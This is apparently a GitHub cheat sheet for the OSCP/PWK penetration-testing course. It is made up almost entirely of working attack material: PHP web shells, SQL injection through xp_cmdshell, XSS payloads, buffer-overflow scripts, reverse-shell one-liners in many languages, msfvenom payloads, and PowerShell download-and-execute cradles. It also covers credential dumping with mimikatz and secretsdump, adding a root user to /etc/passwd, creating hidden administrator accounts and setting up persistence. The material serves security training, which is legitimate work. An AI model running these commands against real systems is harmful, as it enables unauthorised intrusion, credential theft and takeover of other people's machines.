A cheat sheet to aid you through the PWK course & the OSCP Exam.
(Inspired by PayloadsAllTheThings)
Feel free to submit a Pull Request & leave a star if this helped you.
Disclaimer: None of the below includes spoilers for the PWK labs / OSCP Exam.
I have obtained a lot of this info through other GitHub repos, blogs, sites and more. I have tried to give as much credit to the original creator as possible. If I have not given you credit, please contact me on Twitter: @s1nfulz
- Enumeration
- Exploitation
- Shells & Payloads
- File Transfers
- Password Cracking
- Privilege Escalation
- Post Exploitation
- Pivoting & Port Forwarding
- Useful References
- Thank You
ping 10.10.10.110
64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 msThe TTL value reveals the target OS (subtract from the nearest base to calculate hop count):
| TTL Base | OS | Example |
|---|---|---|
| 64 | Linux / *nix | TTL=61 means 3 hops |
| 128 | Windows | TTL=127 means 1 hop |
| 254 | Solaris / AIX | TTL=250 means 4 hops |
nmap -vvv -sC -sV -p- --min-rate 2000 10.10.10.10
nmap -sT -p 22,80,110 -A 10.10.10.10
reconnoitre -t 10.10.10.10 -o . --services --quick --hostnames
nc -v -n -z -w1 10.10.10.10 1-10000UDP scans can take hours; netstat is a better alternative if you already have a shell.
nmap -sU --top-ports 10000 10.10.10.10
nmap -sT -sU -p 22,80,110 -A 10.10.10.10
nmap -sT -sU -p- --min-rate 2000 10.10.10.10# SNMP
nmap -p161 -sU 10.10.10.10
# SSH algorithms
nmap --script ssh2-enum-algos 10.10.10.10
# SSL/TLS
nmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 10.10.10.10nmap -oA output --stylesheet nmap-bootstrap.xsl 10.10.10.10
firefox nmap-bootstrap.xslfor i in {1..254}; do (ping -c 1 192.168.1.$i | grep "bytes from" &); done
fping -g 192.168.0.1/24for i in $(seq 1 255); do
ping -c1 192.168.125.$i 2>/dev/null 1>&2
if [[ $? -eq 0 ]]; then
echo "192.168.125.$i is up"
fi
donefor /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.1.%i > nul && echo 192.168.1.%i is up.$ping = New-Object System.Net.Networkinformation.Ping
1..254 | % { $ping.send("10.9.15.$_", 1) | where status -ne 'TimedOut' | select Address | fl * }nmap -sP 192.168.0.1-254host -t axfr domain.local 10.10.10.10
host -l domain.local 10.10.10.10
dig @10.10.10.10 domain.local axfrsmbmap -H 10.10.10.10
smbclient -L 10.10.10.10
smbclient //10.10.10.10/share$nmap -p161 -sU -iL ips.txt
snmpwalk -c public -v1 10.10.10.10
onesixtyone -c community.txt -i ips.txt# Linux/Apache
gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,html,js,txt,jsp,pl -s 200,204,301,302,307,403,401
# Windows/IIS
gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,html,js,txt,asp,aspx,jsp,bak -s 200,204,301,302,307,403,401
# HTTPS
gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69# Linux/Apache
python3 dirsearch.py -r -u http://10.10.10.10/ \
-w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,jsp,pl -t 50
# Windows/IIS
python3 dirsearch.py -r -u http://10.10.10.10/ \
-w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,asp,aspx,jsp,bak -t 50nikto -h 10.10.10.10 -p 80 # HTTP
nikto -h 10.10.10.10 -p 443 # HTTPSwfuzz -u http://10.10.10.10/page.php?dir=../../../../../../../../../FUZZ%00 \
-w /usr/share/wfuzz/wordlist/general/common.txt# Linux
netstat -tulpn | grep LISTEN
# FreeBSD / macOS
netstat -anp tcp | grep LISTEN
netstat -anp udp | grep LISTEN
# OpenBSD
netstat -na -f inet | grep LISTEN
# Nmap (local)
sudo nmap -sT -O localhost # TCP
sudo nmap -sU -O 192.168.2.13 # UDPTypical bad characters: 0x00, 0x0A, 0x0D
General Steps:
- Fuzzing - send increasing buffers to find crash point
- Finding EIP offset - use
pattern_create/pattern_offset - Controlling EIP - verify with
Bcharacters at the offset - Finding bad characters - send all bytes
\x01-\xFFand check for mangling - Locating
jmp esp- find a reliable return address with!mona jmp -r esp - Generating payload with
msfvenom(excluding bad chars) - Getting a reverse shell
#!/usr/bin/python
import time, struct, sys
import socket as so
buff = ["A"]
max_buffer = 4000
counter = 100
increment = 100
while len(buff) <= max_buffer:
buff.append("A" * counter)
counter = counter + increment
for string in buff:
try:
server = str(sys.argv[1])
port = int(sys.argv[2])
except IndexError:
print("[+] Usage: python %s <IP> <PORT>" % sys.argv[0])
sys.exit()
print("[+] Attempting to crash at %s bytes" % len(string))
s = so.socket(so.AF_INET, so.SOCK_STREAM)
try:
s.connect((server, port))
s.send((string + '\r\n').encode())
s.close()
except:
print("[+] Connection failed. Check IP/port or debugger.")
sys.exit()Use msf-pattern_create -l <length> to generate a pattern, send it, then find the offset with msf-pattern_offset -q <EIP_value>.
#!/usr/bin/python
import sys
import socket as so
# Replace with pattern from: msf-pattern_create -l 500
pattern = "Aa0Aa1Aa2Aa3..."
try:
server = str(sys.argv[1])
port = int(sys.argv[2])
except IndexError:
print("[+] Usage: python %s <IP> <PORT>" % sys.argv[0])
sys.exit()
s = so.socket(so.AF_INET, so.SOCK_STREAM)
s.connect((server, port))
s.send((pattern + '\r\n').encode())
s.close()Once you know the offset (e.g., 251), verify EIP control:
buffer = "A" * 251 + "B" * 4 + "C" * 90If EIP = 42424242 (BBBB), you control it.
BOF Resources:
- NCC Group - Writing Exploits for Win32
- Corelan - Exploit Writing Tutorial Part 1
- dostackbufferoverflowgood
- VeteranSec - 32-bit Windows BOF Made Easy
- LiveOverflow - Binary Exploitation
- 0xRick - Binary Exploitation
- Exploit Education - Protostar (32-bit) and Phoenix (64-bit)
Full credit for the BOF POC scripts: jessekurrus/brainpan
<?php phpinfo(); ?>
<?php echo shell_exec(whoami); ?>
<?php system($_GET['cmd']); ?>
<?php echo assert($_GET['cmd']); ?><?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'"); ?>LFI/RFI Resources:
- FuzzDB LFI Payloads
- Total OSCP Guide - LFI
- HighOn.Coffee - LFI Cheat Sheet
- FuzzySecurity LFI Scripts
EXEC master..xp_cmdshell 'whoami';
' exec master..xp_cmdshell 'whoami' --sqlmap -u "http://example.com/test.php?test=test" --level=5 --risk=3 --batchSQL Injection Resources:
<script>alert(1)</script>
<sCrIpT>alert(1)</script>
<img src=x onerror=alert(3)>" autofocus onfocus="alert(3)
javascript:alert(document.cookie)
<?xml version="1.0" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert(document.location);</script>
</svg>- JSFuck - Encode JS payloads using only
[]()!+characters - PortSwigger XSS Cheat Sheet - Generate custom payloads
# Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <domain/user>
# PowerShell (Invoke-Kerberoast)
powershell.exe -NoP -NonI -Exec Bypass IEX \
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); \
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
# Dump NTLM hashes
impacket-secretsdump -just-dc-ntlm <DOMAIN>/<USER>@<DC_IP> -outputfile hashes.txt# On target
ping -n 3 10.10.10.10
# On attacker (verify)
tcpdump -i tun0 icmpresponder -I tun0 -wrF- Modlishka - Reverse proxy for phishing with 2FA bypass
- Evilginx2 - Man-in-the-middle attack framework for phishing
- Modlishka 2FA Bypass Guide
- WPScan - WordPress vulnerability scanner
wpscan --url http://10.10.10.10 --enumerate u,vp,vt- Top Hat Sec - WordPress Pentesting
# Bash
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
# Perl
perl -e 'use Socket;$i="10.10.10.10";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# PHP
php -r '$sock=fsockopen("10.10.10.10",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# Netcat
nc -e /bin/sh 10.10.10.10 4444
# Netcat (named pipes, if -e not available)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.10.10 4444 >/tmp/fResources:
- PentestMonkey - Reverse Shell Cheat Sheet
- RevShells.com - Online reverse shell generator
nc 10.10.10.10 4444 -e cmd.exe# 1. Spawn a PTY
python -c 'import pty; pty.spawn("/bin/bash")'
# (or python3)
# 2. Background the shell
# Press Ctrl-Z
# 3. On your local terminal
stty raw -echo
fg
# 4. Back in the reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>Listener:
socat file:$(tty),raw,echo=0 tcp-listen:4444Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:4444perl -e 'exec "/bin/sh";'
/bin/sh -imsfvenom -l payloads# Linux ELF
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
# Windows EXE
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe# PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
# ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war# Python
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py
# Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh
# Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl# See all output formats
msfvenom --help-formats
# Linux shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f <language>
# Windows shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f <language>use exploit/multi/handler
set PAYLOAD <payload_name>
set LHOST <IP>
set LPORT <PORT>
set ExitOnSession false
exploit -j -z
Quick launch: msfconsole -L -r handler.rc
Payload Types:
| Type | Description | Example |
|---|---|---|
| Non-staged | Full payload in one shot | shell_reverse_tcp (works with netcat) |
| Staged | Payload delivered in parts | shell/reverse_tcp (requires multi/handler) |
Resources:
Compile a simple binary that spawns cmd.exe (useful for privilege escalation via writable service paths, etc.):
#include <stdlib.h>
int main() {
system("C:\\Windows\\System32\\cmd.exe");
}Cross-compile on Linux with MinGW:
apt install mingw-w64
x86_64-w64-mingw32-gcc pwn.c -o pwn.exeOn the victim machine (Windows):
net use x: \\10.10.10.10\myshare
copy whatever.zip x:Place the file in /var/www/html/ and start Apache:
service apache2 startOn the remote server:
wget http://10.10.10.10/file.bin # Single file
wget -r http://10.10.10.10/directory/ # Entire directoryKali to Windows via Metasploit:
use auxiliary/server/tftp
set TFTPROOT /usr/share/mimikatz/Win32/
run
On the Windows target:
tftp -i 10.10.10.10 GET mimikatz.exe# Sender (Windows)
nc -nv 10.10.10.10 4444 < file.zip
# Receiver (Linux)
nc -nlvp 4444 > file.zipInteractive session:
Invoke-WebRequest -Uri http://10.10.10.10/exploit.py -OutFile C:\Users\Victim\exploit.pyNon-interactive (create wget.ps1):
$client = New-Object System.Net.WebClient
$url = "http://10.10.10.10/file.txt"
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)On the local host:
cat /path/to/exploit.py | base64 > encoded.b64Transfer encoded.b64 to the remote server, then decode:
cat encoded.b64 | base64 -d > exploit.pycertutil.exe -urlcache -split -f "http://10.10.10.10/file.zip" file.zip1. Create upload.php on your attacker web root (/var/www/html/):
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>2. Create the uploads directory:
sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads3. Upload from victim (PowerShell):
powershell.exe -exec unrestricted -noprofile -Command \
"(New-Object System.Net.WebClient).UploadFile('http://10.10.10.10/upload.php', 'file-to-upload.txt')"- Nakkaya - NetCat File Transfers
- isroot.nl - Post-Exploitation File Transfers on Windows
- ropnop - Transferring Files from Kali to Windows
- 0xdf - Windows File Transfers
- JollyFrogs - Transfer Files to Windows
hashcat -m 500 -a 0 -o cracked.txt --force hash.txt /path/to/wordlist.txt- Hashcat Example Hashes - Find the
-mmode number for your hash type
john --rules --wordlist=/path/to/wordlist.txt hash.txtcme smb 10.10.10.10 -u username -d domain -p passwordA small season/month wordlist (wordlists/English-dates.txt) is included in this repo for spraying common patterns like Spring2021, Summer2020, etc.
- Hashcat Example Hashes
- Hashcat NTLM Brute Force
- HashID - Identify Hash Types
- HashKiller
- CrackStation
- Hydra Web Auth Dictionary Attack
- naive-hashcat
Tip: If GCC and wget are installed on the target, it may be vulnerable to a kernel exploit.
grep -Ri 'password' .
find / -perm -4000 2>/dev/null
find / -perm -u=s 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/nullIf you have write access to /etc/passwd:
# Generate a password hash
openssl passwd mrcake
# Output: WVLY0mgH0RtUI
# Add a root-level user
echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
# Switch to the new user
su root2
# Password: mrcakeRequires code execution as the target user (e.g., via MySQL sys_eval running as root):
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
int main() {
setuid(geteuid());
system("/bin/bash");
return 0;
}If NFS shares are misconfigured with no_root_squash, you can mount the share and create SUID binaries.
- GTFOBins - Break out of restricted shells / abuse SUID binaries
- Helper script: gtfo
- LinEnum
- linux-exploit-suggester
- Linux Exploit Suggester 2
- pspy - Monitor processes without root
- unix-privesc-check
- linuxprivchecker
- g0tmi1k - Basic Linux Privilege Escalation
- Linux Priv Esc via sudo
churrasco -d "net user /add <username> <password>"
churrasco -d "net localgroup administrators <username> /add"
churrasco -d "NET LOCALGROUP \"Remote Desktop Users\" <username> /ADD"cmdkey /list
runas /user:DOMAIN\Administrator /savecred "cmd.exe"- Check if PowerShell is installed (
C:\Windows\System32\WindowsPowerShell) - Run PowerUp or other enumeration scripts
- Check for kernel exploits (use Windows Exploit Suggester)
- Inspect Program Files for outdated / vulnerable software
- Check
cmdkey /listfor stored credentials
- FuzzySecurity - Windows Privilege Escalation Fundamentals
- absolomb - Windows Privilege Escalation Guide
- PowerUp / PowerSploit
- Powerless - Windows enumeration (no PowerShell needed)
- JAWS - Just Another Windows Enum Script
- Watson - .NET-based patch enumeration
- Windows Exploit Suggester
- Local Privilege Escalation Workshop
- Stored Credentials Exploitation
mimikatz.exe
privilege::debug
sekurlsa::logonpasswordsWMIC USERACCOUNT LIST BRIEF
net user
net localgroup Users
net localgroup Administrators
net user USERNAME NEWPASS /add
net user "USER NAME" NEWPASS /add
net localgroup administrators USERNAME /add# Add a new user
net user /add hacker 1234567
# Add to Administrators
net localgroup administrators /add hacker
# Add to Remote Desktop Users
net localgroup "Remote Desktop users" hacker /add
# Start Remote Desktop service
net start TermService
# Check if TermService is running
tasklist /svc | findstr /C:TermService
# Enable Terminal Services permanently
sc config TermService start=auto
# Enable via registry (requires reboot)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f- SharPersist - C# persistence toolkit
- Metasploit:
use exploit/windows/local/registry_persistence
Credit: s0wr0b1ndef OSCP notes
/usr/share/doc/python-impacket/examples/psexec.py user@10.10.10.10cd /usr/share/windows-binaries
python /usr/share/doc/python-impacket/examples/smbserver.py share .On the target:
\\10.10.10.10\share\mimikatz.exeWindows XP lacks a built-in whoami command. Use the one from Kali:
# On Kali - start an SMB server
smbserver.py share /usr/share/windows-binaries/# On the XP target
\\10.10.14.14\share\whoami.exe
# Output: NT AUTHORITY\SYSTEMIf %username% doesn't expand, you're likely running as SYSTEM:
echo %username%
# If this prints "%username%" literally, you're SYSTEMCredit: 0xdf - HTB Legacy
| Type | Direction | Use Case |
|---|---|---|
| Local | Forward local port to remote | Access a remote service locally |
| Remote | Forward remote port to local | Expose a local service to the remote machine |
| Dynamic | SOCKS proxy | Route arbitrary traffic through the tunnel |
On your machine (server):
./chisel server -p 8080 --reverseOn the victim:
./chisel client YOUR_IP:8080 R:1234:127.0.0.1:12341. Generate an SSH key pair on the pivot machine:
ssh-keygen
cat ~/.ssh/id_rsa.pub2. Add the public key to ~/.ssh/authorized_keys on your Kali machine with restrictions:
from="[VICTIM_IP]",command="echo 'Port forwarding only'",no-agent-forwarding,no-X11-forwarding,no-pty [PUBLIC_KEY]
3. Start SSH on Kali:
sudo service ssh start4. Create the tunnel from the pivot machine:
ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" \
-i /path/to/id_rsa kali@KALI_IP5. Configure proxychains (/etc/proxychains.conf):
socks4 127.0.0.1 1080
6. Use proxychains (TCP Connect scans only with nmap):
sudo proxychains nmap -sT -p80 -sC -sV --open -Pn -n 10.10.10.10Quick SSH Tunnels:
# Remote port forward
ssh user@10.10.10.10 -R 1234:127.0.0.1:1234
# Dynamic SOCKS proxy
ssh -D 1337 -q -C -N -f user@10.10.10.10# 1. Configure proxychains
# vi /etc/proxychains.conf -> socks5 <ip> 9080
# 2. Import and start the proxy
Import-Module .\Invoke-SocksProxy.psm1
Invoke-SocksProxy -bindPort 9080
# 3. Use it
# proxychains nmap -sT <ip>sshuttle -r user@10.10.10.10 10.1.1.0/24rdesktop -u user -p password 10.10.10.10 -g 85% -r disk:share=/root/
xfreerdp /d:domain.local /u:username /p:password /v:10.10.10.10 /cert-ignorepython -m SimpleHTTPServer 80 # Python 2
python3 -m http.server 80 # Python 3
php -S 0.0.0.0:80 # PHP
ngrok http 80 # ngrok- Pentest Partners - Breaking out of Citrix
- SRA.io - SiteKiosk Breakout
- TrustedSec - Kiosk/POS Breakout Keys
- NCC Group - Environment Breakout Issues (PDF)
- GracefulSecurity - Citrix Breakout
- NetSPI - Breaking out of Applications
Default writable directories for normal users (varies by OS version):
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
Source: UltimateAppLockerByPassList
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -printScan multiple IPs with organized output (included in this repo as automap.sh):
#!/bin/bash
for line in $(cat ip.txt); do
mkdir -p $line/screenshots
nmap -sC -sV -p- -o ./$line/Full-TCP $line -Pn --min-rate 2000
done| Category | Lab | URL |
|---|---|---|
| Terminal Skills | OverTheWire Bandit | https://overthewire.org/wargames/bandit/ |
| Web Hacking | OverTheWire Natas | https://overthewire.org/wargames/natas/ |
| XSS | Google XSS Game | https://xss-game.appspot.com/ |
| XSS | PwnFunction XSS Labs | https://xss.pwnfunction.com/ |
| XSS | PortSwigger XSS Labs | https://portswigger.net/web-security/cross-site-scripting |
| XSS | alert(1) to win | http://alf.nu/alert1 |
powershell -ExecutionPolicy ByPass -File script.ps1powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"# PowerUp
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:80/PowerUp.ps1') | powershell -noprofile -
# Generic
powershell -nop -exec bypass IEX "(New-Object Net.WebClient).DownloadString('http://10.10.10.10/Script.ps1'); Invoke-Script"xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.10.10/Nishang-ReverseShell.ps1\")powershell -c IEX(New-Object Net.WebClient).DownloadFile('http://10.10.10.10/file', 'file')Resources:
- Nishang - PowerShell offensive framework
- Sherlock - PowerShell priv esc finder (deprecated, use Watson)
Thanks to these people for including my cheatsheet on their website/blog: